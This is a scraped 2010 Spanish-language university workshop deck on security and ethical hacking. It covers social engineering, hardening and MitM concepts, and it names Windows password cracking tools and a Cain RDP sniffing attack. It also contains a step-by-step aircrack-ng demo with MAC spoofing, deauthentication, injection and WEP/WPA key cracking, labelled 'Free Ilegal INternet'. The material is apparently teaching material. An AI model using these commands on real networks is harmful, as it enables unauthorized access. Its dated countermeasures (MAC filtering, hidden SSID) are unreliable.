SlideShare ist ein Scribd-Unternehmen logo
1 von 36
Downloaden Sie, um offline zu lesen
Universidad Tecnológica del Sur de Sonora




eXpLoD
Agosto 2010
Agenda
Presentación
Disclaimer
Arsenal
Conceptos Básicos
Seguridad Informática
Ingeniería Social
Seguridad dentro y fuera del equipo (Tipos de Seguridad)
Software Reset Windows Password Tools (Hiren´s & UBCDW)
Copy/Paste Hack Attack All Windows Versions (Ubuntu CD)
  OverView
Crack Windows Passwords Tools (OphCrack)
  Contramedidas
Endurecimiento de políticas de seguridad (Hardening)
Herramientas de Intrusión: scanners, sniffers, IDS, etc.
Agenda
Ethical Hacking
Ataque Man-in-the-middle (MitM), conceptos
Remote Desktop Protocol (RDP), concepto y uso
Cain MitM RDP Windows Sniffing Password Attack
Contramedidas
Network Wireless, conceptos, usos y características
DEMO “Cracking Wireless Passwords“ con aircrack-ng
OverView
Contramedidas
Recursos
Preguntas y Respuestas
Conclusiones
Contacto
Presentación



¿ Quién eres?, Quien Soy ?

¿ Qué sabes y que te gustaria aprender ?

¿ Por qué ?
Disclaimer
Todos los contenidos expuestos, actividades
realizadas y demostraciones de esta conferencia-
taller son con fines 100% educativos, por lo cual
los expositores e institución educativa que los
imparten se deslindan de cualquier responsabilidad
que los participantes a dicho evento llegaran a
adquirir por el mal uso o daño que pudieran causar
con la información o herramientas aquí expuestas.
Arsenal
Para la realización de esta conferencia taller
utilizaremos:

- Desktop PC
- VirtualBox
- Tarjeta de red inalámbrica soportada por aircrack
- Router inalámbrico
- Computadora portátil
- Maquinas virtuales de Windows XP, 2003, Vista y 7
- CDs de: Ubuntu 9.10, OphCrack, etc.
- Software de propósito general
Conceptos Básicos
Hacker: Es una buena persona que hace cosas
malas :P

Red de computadoras: Montón de compus unidas
por cable para pasarse virus, bajar música y
chatear.

Sistema Operativo: Programa que controla toda la
compu (Windows, Linux, MacOS, Unix, etc.)

Sniffer: Olfateador de red (sabueso)

Virus: Invento del gobierno para distraer nuestra
atención, H1N1
Conceptos Básicos
Firewall: Software o Hardware que protege los
sistemas informáticos de intrusiones en la red

Puerto: Número de conexión dentro de una
computadora para transferir información en la red

Cracker: “Criminal Hacker“

Escritorio Remoto: Aplicación para administrar a
distancia una computadora (Ej. VNC y RDP)

Windows: Muy CrackHackeable :P (Aquí lo
demostraremos, jejejeje )
Seguridad Informática
      ¿Que es?                          ¿Cómo nos afecta?
      • Es simplemente el conjunto      • Estamos rodeados de elementos
        de métodos, formas y              de seguridad informática: PIN de
        estándares que permiten           tarjeta de débito y crédito,
        asegurar que las políticas de     números de validación IMEI,
        una organización sean             tokens bancarios, contraseñas
        utilizadas de la manera en        de servicios en línea, validadores
                                          de sistemas (como Captcha)
        que fueron planeadas              todos estos son parte de nuestra
        previniendo la alteración o       vida diaria, sin una contraseña
        modificación o reemplazo de       no podríamos accesar nuestra
        los datos o directivas            cuenta de correo, o retirar dinero
        contenidas en nuestros            de un cajero y si las perdemos o
        recursos de información por       nos la roban suele ser laborioso
                                          (social y legal) el obtenerlos de
        personas o entidades no           regreso.
        autorizadas.

      ¿Todo es basado en
      cómputo?                          ¿Cómo lo aseguramos?
      • No, en realidad un recurso      • Dependiendo del tipo de
        informático es todo aquel         recurso, si es electrónico
        que resguarda información,        quizá sea necesario usar
        una ficha bibliográfica, una      métodos de biométrica, si es
        muestra de ADN codificada,        algo mecánico, es probable
        un pequeño papel con un           que con un juego de llaves
        código de acceso para una         de seguridad o de candados
        caja de seguridad mecánica,       rotatorios logremos nuestro
        todo esto es información y        objetivo, todo depende
        es tomado en cuenta al            cuanto nos interesa
        momento de crear políticas,       proteger la información.
        acuerdos y leyes sobre la
        informática.
Ingeniería Social




¿Qué es?                        ¿Cómo me afecta?                  ¿Cómo puedo saber si estoy       ¿Cómo puedo evitarlo?
                                • Al no validar las referencias   siendo victima de un             •Sencillo, si no confiamos en la
• En el campo de la
  informática se denomina         o no seguir el protocolo de     “ingeniero social”?               persona que nos pide cierta
  “Ingeniería social” al          seguridad adecuado para         • Muy simple, cuando alguien      información (supongamos un
  conjunto de métodos y           divulgar contraseñas o            nos pide algún tipo de          técnico de soporte de nuestro
  prácticas usados para           cualquier otra información        información privilegiada y      lugar de trabajo) podemos
  obtener información de          sensible, podríamos ser           esta persona es insistente      pedirle que nos deje sus datos
                                  cómplices de un crimen,           cuando le requerimos seguir     y comunicarnos con el/ella 10
  usuarios legítimos y con la
                                  México ha acordado con                                            minutos después de validar si
  información obtenida lograr                                       un protocolo para validar su    la petición es legitima, es decir:
  acceso a sistemas               organismos internacionales        intención es altamente
                                  la homologación y/o                                               solo sigamos los protocolos
  protegidos, siendo esta                                           probable que estemos            que existan para dar
  práctica de uso común entre     adecuación de códigos             siendo victimas de un           información, podemos crear
  piratas informáticos y          penales para que estos            intento de robo de              los propios en casa y seguir los
  delincuentes                    delitos sean perseguidos.         información por un              establecidos en la escuela u
  computacionales.                                                  ingeniero social/hacker.        oficina.
Seguridad Dentro y Fuera

Debemos estar conscientes que ningún equipo o sistema es 100% seguro o fiable.
Establecer (y seguir) protocolos y procedimientos de seguridad para contraseñas, códigos, PINs, que nos
permitan asegurar que cuando nos sean requeridos, quien nos lo pida sea alguien autorizado y con un motivo
válido.

Adecuar estas políticas a nuestro propio equipo de cómputo y sistemas, portales y sitios que usamos con
frecuencia (como longitud de contraseñas, uso de caracteres especiales y mayúsculas, etc.) y prevenir el uso
de “cuentas compartidas” o “uso múltiple” pues eso eleva el riesgo de control y seguridad.

Ser precavidos, si algo no parece estar correcto es muy probable que no lo este.

Si estamos en la escuela u oficina y algo parece estar mal, reportarlo inmediatamente ya sea a nuestro jefe o
profesor o al área encargada de sistemas.

Seguir los reglamentos (si no nos esta permitido accesar ciertos sitios, no lo hagamos).


Seguir nuestro instinto, muchas veces nosotros somos los mejores jueces para evaluar si algo esta bien o no.
Tipos de Seguridad:
Seguridad Física:       Seguridad Física consiste en la "aplicación de
barreras físicas y procedimientos de control, como medidas de
prevención y contramedidas ante amenazas a los recursos e
información confidencial"(1). Se refiere a los controles y mecanismos
de seguridad dentro y alrededor del Centro de Cómputo así como los
medios de acceso remoto al y desde el mismo; implementados para
proteger el hardware y medios de almacenamiento de datos.

Seguridad Lógica:         La mayoría de los daños que puede sufrir un
centro de cómputos no será sobre los medios físicos sino contra
información por él almacenada y procesada. La Seguridad Física, sólo
es una parte del amplio espectro que se debe cubrir para no vivir con
una sensación ficticia de seguridad. Como ya se ha mencionado, el
activo más importante que se posee es la información, y por lo tanto
deben existir técnicas, más allá de la seguridad física, que la aseguren.
Estas técnicas las brinda la Seguridad Lógica.
Software Reset Windows

Password Tools (Hiren´s & UBCDW)




c:windowssystem32configsam
Copy/Paste Hack Attack All
   Windows Versions (Ubuntu CD)




Copy/Paste ??¡¡¡     OverView
Crack Windows Passwords Tools
                   (OphCrack)




Woooow, is Cracking ¡¡¡¡ :x
Contramedidas
1- Seguridad Física del equipo
2- Boot CD deshabilitado
3- Password supervisor habilitado

4- Contraseñas robustas contra el password cracking
Hardening
    ¿Qué es?                                 ¿Cómo se logra?
    • Un conjunto de métodos y directivas    • Las técnicas son amplias y van desde
      que permiten elevar el nivel de          la eliminación de cuentas de acceso
      seguridad de un servidor                 y validación mediante métodos
      computacional (principalmente) con       alternativos (como LDAP) hasta la
      el fin de denegar accesos no             desinstalación, revisión y adecuación
      autorizados y evitar intrusiones y/o     de servicios, archivos de
      ataques computacionales, existen         configuración e instalación de
      ciertos programas que nos ayudan a       centinelas de cambios en las
      detectar fallos como “Bastille” de       maquinas a “endurecer”, existen
      HP/Compaq que tuvo un éxito mas o        incluso niveles que permiten
      menos amplio en sistemas con             comunicación solo de 1:1 (es decir
      Solaris y posteriormente en sistemas     una maquina solo va a “escuchar” a
      GNU/Linux.                               otra que fue validada y no más.


     ¿Quién lo hace?                         ¿Qué sistema es el más inseguro?
     • Principalmente, administradores de    • En realidad, existe un mantra que
       sistemas o consultores de               dice: “No hay sistema inseguro,
       seguridad computacional, la razón       solo un mal administrador” es
       principal de esto es el                 decir, si adecuamos un equipo y
       conocimiento requerido en               elevamos el nivel de seguridad a lo
       administración de sistemas e            técnicamente posible, es muy
       infraestructura para poder llevar a     probable que los demás errores
       cabo un buen endurecimiento (con        sean bugs del software mismo.
       lo cual, una vez más, no podemos
       garantizar que sea 100% mas
       seguro, solo mas estable).
Herramientas de Intrusión:
 scanners, sniffers, IDS, etc.
                         • Denegación de servicio (PaP o distribuidas)
                         • Exploración de servicios y vulnerabilidades
  Existen una gran         (PenTesting y Exploitation)
     cantidad de         • Rompimiento de claves de autenticación (Auth
                           Cracking)
herramientas de este     • Capturadores de paquetes promiscuos (Sniffers,
                           AirSniffers)
 tipo entre las mas      • Enumeradores de puertos y adivinadores de
comunes usadas en          plataforma.
                         • Enmascaradores o “phishing posers” (servicios que
contra de servidores:      parecen legítimos pero no lo son, enfocados al robo
                           de información e identidad)



                         •   Troyanos
  Por el lado de los     •   Gusanos
 ataques a usuarios      •   Secuestradores y envenenadores de DNS
existen las siguientes   •   Keyloggers
    herramientas:        •   Replicadores


                             http://sectools.org/
Ethical Hacking
¿Qué es?
•La intrusión ética (o ethical
 hacking) es la aplicación de
 herramientas de intrusión,
 penetración, robo,
                                                                          ¿No es contraproducente?
 personificación y negación de
 servicio llevado a cabo por                                              •No, al usar las armas que el
 “hackers éticos”, es decir,                                               enemigo utiliza es mas factible
 personas con la experiencia y                                             que podamos determinar el
 conocimiento suficiente para                                              nivel de riesgo, y por tanto la
 llevar a cabo estas pruebas en                                            respuesta que debemos dar ante
 nombre de la organización (es                                             un ataque, es, viéndolo como
 decir de manera legal y prevista)                                         analogía medica, como cuando
 para determinar el nivel de                                               nos vacunan, pues nos inoculan
 seguridad de una red de equipos                                           una “versión” del virus del cual
 o servicios (incluido el aspecto                                          nos quieren hacer inmunes.
 de ingeniería social).




                                     ¿Por qué es importante?                                                  ¿Es fiable?
                                     •Al conocer el nivel de seguridad                                        •Al contratar nosotros un servicio
                                      que se tiene en nuestra                                                  (o realizarlo de manera interna)
                                      organización es mucho mas                                                estamos confiando en la ética
                                      sencillo, que no simple, el tomar                                        profesional de quien evalúa por
                                      medidas que puedan subsanar                                              lo que si, siempre llevamos un
                                      estas deficiencias.                                                      riesgo, pero se establece un
                                                                                                               contrato de buena fe haciéndolo
                                                                                                               “suficientemente fiable”.
Ataque Man-in-the-middle (MitM),
    conceptos
En criptografía, un ataque man-in-the-middle (MitM o
intermediario, en castellano) es un ataque en el que
el enemigo adquiere la capacidad de leer, insertar y
modificar a voluntad, los mensajes entre dos partes
sin que ninguna de ellas conozca que el enlace entre
ellos ha sido violado. El atacante debe ser capaz de
observar e interceptar mensajes entre las dos
víctimas.
Ataque Man-in-the-middle (MitM),
    conceptos
El ataque MitM puede incluir algunos de los siguientes subataques:
1. Intercepción de la comunicación (eavesdropping), incluyendo
    análisis del tráfico y posiblemente un ataque a partir de textos
    planos (plaintext) conocidos.
2. Ataques a partir de textos cifrados escogidos, en función de lo que
    el receptor haga con el mensaje descifrado.
3. Ataques de sustitución.
4. Ataques de repetición.
5. Ataque por denegación de servicio (denial of service).
Contramedidas

Claves públicas
Autenticación mutua fuerte
Claves secretas (secretos con alta entropía)
Passwords (secretos con baja entropía)
Otros criterios, como el reconocimiento de voz u otras características
biométricas
Remote Desktop Protocol (RDP),
   concepto y uso
Remote Desktop Protocol (RDP) es un protocolo
propietario desarrollado por Microsoft que permite la
comunicación en la ejecución de una aplicación entre
un terminal (mostrando la información procesada que
recibe del servidor) y un servidor Windows
(recibiendo la información dada por el usuario en el
terminal mediante el ratón ó el teclado).
Cain MitM RDP Windows Sniffing
       Password Attack y

        Contramedidas



RDP               OverView
Network Wireless, conceptos,
   usos y características
El término red inalámbrica (Wireless network) en
inglés es un término que se utiliza en informática para
designar la conexión de nodos sin necesidad de una
conexión física (cables), ésta se da por medio de
ondas electromagnéticas. La transmisión y la
recepción se realizan a través de puertos.
Una de sus principales ventajas es notable en los
costos, ya que se elimina todo el cable Ethernet y
conexiones físicas entre nodos, pero también tiene
una desventaja considerable ya que para este tipo de
red se debe de tener una seguridad mucho mas
exigente y robusta para evitar a los intrusos.
DEMO “Cracking Wireless
      Passwords“ con aircrack-ng

                   OverView y

               Contramedidas
Free Ilegal INternet
DEMO “Cracking Wireless
 Passwords“




Aircrack: http://www.aircrack-ng.org/

Aircrack Spanish: http://www.aircrack.es/

Compatibilidad de tarjetas inalámbricas con Linux:
http://linux-wless.passys.nl/query_alles.php
DEMO “Cracking Wireless
   Passwords“
sudo apt-get install aircrack-ng

sudo apt-get install macchanger

sudo airmon-ng start wlan0

sudo ifconfig mon0 down

sudo macchanger -m 00:11:22:33:44:55 mon0

sudo ifconfig mon0 up

sudo airodump-ng mon0
DEMO “Cracking Wireless
     Passwords“
control + c
sudo airodump-ng -c [# canal] -w [nombre red] --bssid [direccion MAC] mon0

PARA WEP

sudo aireplay-ng -1 6000 -a [direccion MAC] -h 00:11:22:33:44:55 mon0

PARA WPA

sudo aireplay-ng -0 1 -a [direccion MAC] -c [STATION] mon0

PARA WEP
sudo aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [direccion MAC] -h 00:11:22:33:44:55 mon0

PARA WPA

sudo aircrack-ng -w [/directorio/del/diccionario.lst] [NOMBRE]*.cap
DEMO “Cracking Wireless
    Passwords“
PARA WEP

sudo aircrack-ng -z [nombre red]*.cap




Esperaremos a que finalice la captura de los paquetes y a su vez el crackeo de los
mismos, hasta que se nos muestre la clave de la red.
Contramedidas

Mac Address Filtering
Hide Wireless SSID
WPAAuthentication System
Recursos
Aprende Viendo: http://aprendeviendo.org.mx
OphCrack: http://ophcrack.sourceforge.net/
UBCD for Windows: http://www.ubcd4win.com/
Top 100 Network Security Tools: http://sectools.org/
Cain & Abel: http://www.oxid.it/cain.html
Aircrack-ng: http://www.aircrack-ng.org/
Ubuntu: http://www.ubuntu.com/
Hiren´s Boot CD: http://www.hirensbootcd.net/
Process Monitor:   http://technet.microsoft.com/en-us/sysinternals/bb896645.aspx


Backtrak: http://www.backtrack-linux.org/
Preguntas y Respuestas
Conclusiones

 La seguridad computacional como un todo.

 El elemento humano dentro de la seguridad computacional.

 El establecimiento de reglas para un mejor nivel de seguridad.

 Necesidad de profesionistas calificados para estos trabajos.

 Gran amplitud de herramientas OpenSource.

 Compromiso social y ético para sistemas.

 Innovación diaria.
Contacto
Gracias ¡¡

Weitere ähnliche Inhalte

Was ist angesagt?

Cuadro comparativo entre moprosoft y cmmi
Cuadro comparativo entre moprosoft y cmmi Cuadro comparativo entre moprosoft y cmmi
Cuadro comparativo entre moprosoft y cmmi Darthuz Kilates
 
Evaluación de Procesos
Evaluación de ProcesosEvaluación de Procesos
Evaluación de Procesoshvasconez
 
Auditoria de sistemas
Auditoria de sistemasAuditoria de sistemas
Auditoria de sistemasgalactico_87
 
Introduccion al Ethical Hacking
Introduccion al Ethical HackingIntroduccion al Ethical Hacking
Introduccion al Ethical HackingJose Manuel Acosta
 
Estructura en un área de seguridad informática
Estructura en un área de seguridad informáticaEstructura en un área de seguridad informática
Estructura en un área de seguridad informáticapersonal
 
Iptables
IptablesIptables
Iptablescercer
 
WINDOWS 2019 HARDENING (Aseguramiento)
WINDOWS 2019 HARDENING (Aseguramiento)WINDOWS 2019 HARDENING (Aseguramiento)
WINDOWS 2019 HARDENING (Aseguramiento)Cristian Garcia G.
 
Auditoría Física
Auditoría FísicaAuditoría Física
Auditoría Físicajosmal 7
 
Hardening de Servidores Linux Oscar Gonzalez
Hardening de Servidores Linux   Oscar GonzalezHardening de Servidores Linux   Oscar Gonzalez
Hardening de Servidores Linux Oscar GonzalezOscar Gonzalez
 
Riesgo de ti
Riesgo de tiRiesgo de ti
Riesgo de tiLeo Gomez
 
UNEG-AS 2012-Inf5: Controles internos para la seguridad en el área de sistemas
UNEG-AS 2012-Inf5: Controles internos para la seguridad en el área de sistemasUNEG-AS 2012-Inf5: Controles internos para la seguridad en el área de sistemas
UNEG-AS 2012-Inf5: Controles internos para la seguridad en el área de sistemasUNEG-AS
 
Vulnerabilidades en sitios web(español)
Vulnerabilidades en sitios web(español)Vulnerabilidades en sitios web(español)
Vulnerabilidades en sitios web(español)Miguel de la Cruz
 
Presentacion planificación de proyecto de software
Presentacion planificación de proyecto de softwarePresentacion planificación de proyecto de software
Presentacion planificación de proyecto de softwareJose Ignacio Rojas Henriquez
 
Understanding Cyber Attack - Cyber Kill Chain.pdf
Understanding Cyber Attack - Cyber Kill Chain.pdfUnderstanding Cyber Attack - Cyber Kill Chain.pdf
Understanding Cyber Attack - Cyber Kill Chain.pdfslametarrokhim1
 
Informe final de Auditoria Informatica
Informe final de Auditoria InformaticaInforme final de Auditoria Informatica
Informe final de Auditoria InformaticaAmd Cdmas
 

Was ist angesagt? (20)

Casos de estudio
Casos de estudioCasos de estudio
Casos de estudio
 
Cuadro comparativo entre moprosoft y cmmi
Cuadro comparativo entre moprosoft y cmmi Cuadro comparativo entre moprosoft y cmmi
Cuadro comparativo entre moprosoft y cmmi
 
Evaluación de Procesos
Evaluación de ProcesosEvaluación de Procesos
Evaluación de Procesos
 
Auditoria de sistemas
Auditoria de sistemasAuditoria de sistemas
Auditoria de sistemas
 
Introduccion al Ethical Hacking
Introduccion al Ethical HackingIntroduccion al Ethical Hacking
Introduccion al Ethical Hacking
 
Auditoria informatica
Auditoria informaticaAuditoria informatica
Auditoria informatica
 
Estructura en un área de seguridad informática
Estructura en un área de seguridad informáticaEstructura en un área de seguridad informática
Estructura en un área de seguridad informática
 
Iptables
IptablesIptables
Iptables
 
WINDOWS 2019 HARDENING (Aseguramiento)
WINDOWS 2019 HARDENING (Aseguramiento)WINDOWS 2019 HARDENING (Aseguramiento)
WINDOWS 2019 HARDENING (Aseguramiento)
 
Auditoría Física
Auditoría FísicaAuditoría Física
Auditoría Física
 
Hardening de Servidores Linux Oscar Gonzalez
Hardening de Servidores Linux   Oscar GonzalezHardening de Servidores Linux   Oscar Gonzalez
Hardening de Servidores Linux Oscar Gonzalez
 
Riesgo de ti
Riesgo de tiRiesgo de ti
Riesgo de ti
 
UNEG-AS 2012-Inf5: Controles internos para la seguridad en el área de sistemas
UNEG-AS 2012-Inf5: Controles internos para la seguridad en el área de sistemasUNEG-AS 2012-Inf5: Controles internos para la seguridad en el área de sistemas
UNEG-AS 2012-Inf5: Controles internos para la seguridad en el área de sistemas
 
APT Saldırıları
APT SaldırılarıAPT Saldırıları
APT Saldırıları
 
Vulnerabilidades en sitios web(español)
Vulnerabilidades en sitios web(español)Vulnerabilidades en sitios web(español)
Vulnerabilidades en sitios web(español)
 
Presentacion planificación de proyecto de software
Presentacion planificación de proyecto de softwarePresentacion planificación de proyecto de software
Presentacion planificación de proyecto de software
 
Understanding Cyber Attack - Cyber Kill Chain.pdf
Understanding Cyber Attack - Cyber Kill Chain.pdfUnderstanding Cyber Attack - Cyber Kill Chain.pdf
Understanding Cyber Attack - Cyber Kill Chain.pdf
 
Analisis trafico wireshark
Analisis trafico wiresharkAnalisis trafico wireshark
Analisis trafico wireshark
 
Control interno
Control internoControl interno
Control interno
 
Informe final de Auditoria Informatica
Informe final de Auditoria InformaticaInforme final de Auditoria Informatica
Informe final de Auditoria Informatica
 

Andere mochten auch

Seguridad informatica slideshare
Seguridad informatica slideshareSeguridad informatica slideshare
Seguridad informatica slideshareb1cceliagonzalez
 
Presentacion sobre seguridad informatica
Presentacion sobre seguridad informaticaPresentacion sobre seguridad informatica
Presentacion sobre seguridad informaticarayudi
 
Seguridad Informática
Seguridad InformáticaSeguridad Informática
Seguridad Informáticajemarinoi
 
La seguridad informática en power point
La seguridad informática en power pointLa seguridad informática en power point
La seguridad informática en power pointlinda gonzalez
 
Buena presentacion de seguridad informatica
Buena presentacion de seguridad informaticaBuena presentacion de seguridad informatica
Buena presentacion de seguridad informaticadavidrodrigue
 
Unidad 1: Introducción a la Seguridad Informática
Unidad 1: Introducción a la Seguridad InformáticaUnidad 1: Introducción a la Seguridad Informática
Unidad 1: Introducción a la Seguridad InformáticaDarbyPC
 
Mapa mental (seguridad informatica)
Mapa mental (seguridad informatica)Mapa mental (seguridad informatica)
Mapa mental (seguridad informatica)Uber
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informaticaEduardo1601
 
Seguridad informática
Seguridad informáticaSeguridad informática
Seguridad informáticaayd94
 
Medidas básicas de seguridad informática para empresas
Medidas básicas de seguridad informática para empresasMedidas básicas de seguridad informática para empresas
Medidas básicas de seguridad informática para empresaseconred
 
Seguridad informática introduccion
Seguridad informática introduccionSeguridad informática introduccion
Seguridad informática introduccionCarolina Cols
 
Mapa mental seguridad informatica
Mapa mental seguridad informaticaMapa mental seguridad informatica
Mapa mental seguridad informaticaestherbenaim
 
Mapa mental Seguridad de la Información
Mapa mental Seguridad de la InformaciónMapa mental Seguridad de la Información
Mapa mental Seguridad de la InformaciónMateo Panza
 
Mapa mental
Mapa mentalMapa mental
Mapa mentalRafael
 

Andere mochten auch (20)

Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informatica
 
Seguridad informatica slideshare
Seguridad informatica slideshareSeguridad informatica slideshare
Seguridad informatica slideshare
 
Presentacion sobre seguridad informatica
Presentacion sobre seguridad informaticaPresentacion sobre seguridad informatica
Presentacion sobre seguridad informatica
 
Seguridad Informática
Seguridad InformáticaSeguridad Informática
Seguridad Informática
 
La seguridad informática en power point
La seguridad informática en power pointLa seguridad informática en power point
La seguridad informática en power point
 
Buena presentacion de seguridad informatica
Buena presentacion de seguridad informaticaBuena presentacion de seguridad informatica
Buena presentacion de seguridad informatica
 
Ciberataques
CiberataquesCiberataques
Ciberataques
 
Unidad 1: Introducción a la Seguridad Informática
Unidad 1: Introducción a la Seguridad InformáticaUnidad 1: Introducción a la Seguridad Informática
Unidad 1: Introducción a la Seguridad Informática
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informatica
 
Mapa mental (seguridad informatica)
Mapa mental (seguridad informatica)Mapa mental (seguridad informatica)
Mapa mental (seguridad informatica)
 
Historia Seguridad informatica
Historia Seguridad informaticaHistoria Seguridad informatica
Historia Seguridad informatica
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informatica
 
Mapa mental rosario
Mapa mental rosarioMapa mental rosario
Mapa mental rosario
 
Seguridad informática
Seguridad informáticaSeguridad informática
Seguridad informática
 
Seguridad Informatica
Seguridad InformaticaSeguridad Informatica
Seguridad Informatica
 
Medidas básicas de seguridad informática para empresas
Medidas básicas de seguridad informática para empresasMedidas básicas de seguridad informática para empresas
Medidas básicas de seguridad informática para empresas
 
Seguridad informática introduccion
Seguridad informática introduccionSeguridad informática introduccion
Seguridad informática introduccion
 
Mapa mental seguridad informatica
Mapa mental seguridad informaticaMapa mental seguridad informatica
Mapa mental seguridad informatica
 
Mapa mental Seguridad de la Información
Mapa mental Seguridad de la InformaciónMapa mental Seguridad de la Información
Mapa mental Seguridad de la Información
 
Mapa mental
Mapa mentalMapa mental
Mapa mental
 

Ähnlich wie Seguridad Informatica y Ethical Hacking

Seguridad informática- Natalia Valdivia Agudelo, Laura Sánchez Ranea (1).pptx
Seguridad informática- Natalia Valdivia Agudelo, Laura Sánchez Ranea (1).pptxSeguridad informática- Natalia Valdivia Agudelo, Laura Sánchez Ranea (1).pptx
Seguridad informática- Natalia Valdivia Agudelo, Laura Sánchez Ranea (1).pptxNatalia634330
 
Concienciacion en ciberseguridad y buenas prácticas
Concienciacion en ciberseguridad y buenas prácticas Concienciacion en ciberseguridad y buenas prácticas
Concienciacion en ciberseguridad y buenas prácticas Javier Tallón
 
La seguridad informatica
La seguridad informaticaLa seguridad informatica
La seguridad informaticaJerrySegovia
 
La seguridad informatica
La seguridad informaticaLa seguridad informatica
La seguridad informaticaJerrySegovia
 
Mandamientos del hacker diez principios éticos
Mandamientos del hacker  diez principios éticosMandamientos del hacker  diez principios éticos
Mandamientos del hacker diez principios éticosJuanPaez68
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informaticaCesar Salcedo
 
Seguridad y privacidad en windows
Seguridad y privacidad en windowsSeguridad y privacidad en windows
Seguridad y privacidad en windowsazrahim
 
RIESGO Y SEGURIDAD EN LAS COMPUTADORAS
RIESGO Y SEGURIDAD EN LAS COMPUTADORASRIESGO Y SEGURIDAD EN LAS COMPUTADORAS
RIESGO Y SEGURIDAD EN LAS COMPUTADORASFIDOMULTRAXD
 
Seguridad, riesgos y delitos informáticos
Seguridad, riesgos y delitos informáticosSeguridad, riesgos y delitos informáticos
Seguridad, riesgos y delitos informáticosJavi Hurtado
 
Seguridad informática
Seguridad informáticaSeguridad informática
Seguridad informáticaPaulettemayte
 

Ähnlich wie Seguridad Informatica y Ethical Hacking (20)

Seguridad informática- Natalia Valdivia Agudelo, Laura Sánchez Ranea (1).pptx
Seguridad informática- Natalia Valdivia Agudelo, Laura Sánchez Ranea (1).pptxSeguridad informática- Natalia Valdivia Agudelo, Laura Sánchez Ranea (1).pptx
Seguridad informática- Natalia Valdivia Agudelo, Laura Sánchez Ranea (1).pptx
 
Seguridad Informática
Seguridad InformáticaSeguridad Informática
Seguridad Informática
 
Concienciacion en ciberseguridad y buenas prácticas
Concienciacion en ciberseguridad y buenas prácticas Concienciacion en ciberseguridad y buenas prácticas
Concienciacion en ciberseguridad y buenas prácticas
 
Seguridad de redes
Seguridad de redes Seguridad de redes
Seguridad de redes
 
Seguridad en la red
Seguridad en la redSeguridad en la red
Seguridad en la red
 
Seguridad En Internet
Seguridad En InternetSeguridad En Internet
Seguridad En Internet
 
La seguridad informatica
La seguridad informaticaLa seguridad informatica
La seguridad informatica
 
La seguridad informatica
La seguridad informaticaLa seguridad informatica
La seguridad informatica
 
Seguridad en redes
Seguridad en redesSeguridad en redes
Seguridad en redes
 
Mandamientos del hacker diez principios éticos
Mandamientos del hacker  diez principios éticosMandamientos del hacker  diez principios éticos
Mandamientos del hacker diez principios éticos
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informatica
 
Seguridad y privacidad en windows
Seguridad y privacidad en windowsSeguridad y privacidad en windows
Seguridad y privacidad en windows
 
RIESGO Y SEGURIDAD EN LAS COMPUTADORAS
RIESGO Y SEGURIDAD EN LAS COMPUTADORASRIESGO Y SEGURIDAD EN LAS COMPUTADORAS
RIESGO Y SEGURIDAD EN LAS COMPUTADORAS
 
Presentación1
Presentación1Presentación1
Presentación1
 
Tema 1
Tema 1Tema 1
Tema 1
 
Si semana08 riesgos
Si semana08 riesgosSi semana08 riesgos
Si semana08 riesgos
 
Unidad 1
Unidad 1Unidad 1
Unidad 1
 
Seguridad, riesgos y delitos informáticos
Seguridad, riesgos y delitos informáticosSeguridad, riesgos y delitos informáticos
Seguridad, riesgos y delitos informáticos
 
Seguridad informática
Seguridad informáticaSeguridad informática
Seguridad informática
 
Seguridad informática
Seguridad informáticaSeguridad informática
Seguridad informática
 

Mehr von Jose Manuel Acosta (20)

VPN
VPNVPN
VPN
 
Firewalls
FirewallsFirewalls
Firewalls
 
Hardening windows
Hardening windowsHardening windows
Hardening windows
 
Prevencion y Recuperacion de Incidentes
Prevencion y Recuperacion de IncidentesPrevencion y Recuperacion de Incidentes
Prevencion y Recuperacion de Incidentes
 
Continuidad de Actividades
Continuidad de ActividadesContinuidad de Actividades
Continuidad de Actividades
 
Impress y Draw
Impress y DrawImpress y Draw
Impress y Draw
 
Base
BaseBase
Base
 
Writer y Calc
Writer y CalcWriter y Calc
Writer y Calc
 
Gimp e Inkscape
Gimp e InkscapeGimp e Inkscape
Gimp e Inkscape
 
Evolution y Pidgin
Evolution y PidginEvolution y Pidgin
Evolution y Pidgin
 
Firefox
FirefoxFirefox
Firefox
 
Introducción al Software de Fuentes Abiertas
Introducción al Software de Fuentes AbiertasIntroducción al Software de Fuentes Abiertas
Introducción al Software de Fuentes Abiertas
 
Comandos Básicos en GNU/Linux
Comandos Básicos en GNU/LinuxComandos Básicos en GNU/Linux
Comandos Básicos en GNU/Linux
 
Ubuntu parausuarioswindows
Ubuntu parausuarioswindowsUbuntu parausuarioswindows
Ubuntu parausuarioswindows
 
Iniciando conubuntu1004 en
Iniciando conubuntu1004 enIniciando conubuntu1004 en
Iniciando conubuntu1004 en
 
Cenatic informe internacional
Cenatic informe internacionalCenatic informe internacional
Cenatic informe internacional
 
Instalación de CentOS 5.5 en Modo Texto
Instalación de CentOS 5.5 en Modo TextoInstalación de CentOS 5.5 en Modo Texto
Instalación de CentOS 5.5 en Modo Texto
 
Instalación de Ubuntu 10.04
Instalación de Ubuntu 10.04Instalación de Ubuntu 10.04
Instalación de Ubuntu 10.04
 
Introducción a GNU/Linux
Introducción a GNU/LinuxIntroducción a GNU/Linux
Introducción a GNU/Linux
 
Codigo Malicioso
Codigo MaliciosoCodigo Malicioso
Codigo Malicioso
 

Kürzlich hochgeladen

actividades comprensión lectora para 3° grado
actividades comprensión lectora para 3° gradoactividades comprensión lectora para 3° grado
actividades comprensión lectora para 3° gradoJosDanielEstradaHern
 
OCTAVO SEGUNDO PERIODO. EMPRENDIEMIENTO VS
OCTAVO SEGUNDO PERIODO. EMPRENDIEMIENTO VSOCTAVO SEGUNDO PERIODO. EMPRENDIEMIENTO VS
OCTAVO SEGUNDO PERIODO. EMPRENDIEMIENTO VSYadi Campos
 
INSTRUCCION PREPARATORIA DE TIRO .pptx
INSTRUCCION PREPARATORIA DE TIRO   .pptxINSTRUCCION PREPARATORIA DE TIRO   .pptx
INSTRUCCION PREPARATORIA DE TIRO .pptxdeimerhdz21
 
BIOMETANO SÍ, PERO NO ASÍ. LA NUEVA BURBUJA ENERGÉTICA
